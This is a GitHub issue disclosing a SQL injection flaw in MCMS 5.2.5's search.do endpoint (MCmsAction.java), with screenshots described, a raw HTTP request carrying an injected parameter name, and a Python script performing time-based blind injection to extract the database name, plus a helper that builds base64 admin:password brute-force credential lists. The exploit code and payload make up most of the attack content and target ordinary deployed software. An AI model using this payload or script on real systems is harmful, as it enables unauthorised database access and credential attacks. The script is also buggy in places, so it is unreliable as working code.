Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI #63

Closed
aw220 opened this issue Jan 20, 2022 · 1 comment
Closed

MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI #63

aw220 opened this issue Jan 20, 2022 · 1 comment

Comments

@aw220
Copy link

aw220 commented Jan 20, 2022

As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run
image

Look up for filed and find the incoming parameter
image

Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain
image
image

Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain
image
image

This block was found to have database calls
image

Next we try to inject, see the file net/mingsoft/cms/action/web/MCmsAction.java at the top of the class definition, you can know the route is host:port/mcms, and then add the method to be called, you can get the route is host:port/mcms/ search.do, next try to inject

GET /mcms/search.do?1'=0000 HTTP/1.1
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 315bc447-c977-4eb8-8b99-ae231e7a2b08
Host: localhost:8080
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=96B0978724C81C34A99F09541FA893D4


image


Next I wrote a py file for convenient validation, using delayed injection

"""
{0}:要查的东西
{1}:起始位置
{2}:长度
{3}:猜测的值
"""
host = "http://localhost:8080/mcms/search.do?'%2b(select+'123'+AND+if(ascii(substr({0},{1},{2}))%3d{3},sleep(2),2)),--+=000"

def a():
    with open("/Users/helu/penetration/bruteDicts/account/top500_username.txt", "r") as usernames:
        with open("/Users/helu/penetration/bruteDicts/account/pwdFast.txt", "r") as pwds:
            with open("/Users/helu/penetration/bruteDicts/account/admin_pwd.txt", "a+") as file:
                data1 = usernames.read().splitlines()
                data2 = pwds.read().splitlines()
                for username in data1:
                    for pwd in data2:
                        str = base64.encodebytes(("admin" + ":" + pwd).encode("utf-8"))

                        # str += "\n"
                        file.write(str.decode("utf-8"))

def timeout(url):
    try:
        rsp = requests.get(url, timeout=3)
        return rsp.text
    except Exception:
        return "timeout"


def guess_length(target):
    for i in range(1, 100):
        url = host.format(target,1,1,i)
        rsp = timeout(url)
        if "timeout" in rsp:
            print("库长:" + chr(i) )
            return int(chr(i))

def guess_char(tar,len):
    for i in range(0,len+1):
        for j in range(47, 123):
            url = host.format(tar,i,1,"'{0}'".format(j))
            rsp = timeout(url)
            if "timeout" in rsp:
                print(chr(j))

def b(tar):
    length = guess_length(tar)
    guess_char("database()",length)

b("length(database())")
@aboutZZ
Copy link

aboutZZ commented Mar 5, 2022

好家伙,远程执行代码漏洞。快俩月过去了,没一个人回复。

@killfen killfen closed this as completed Sep 9, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants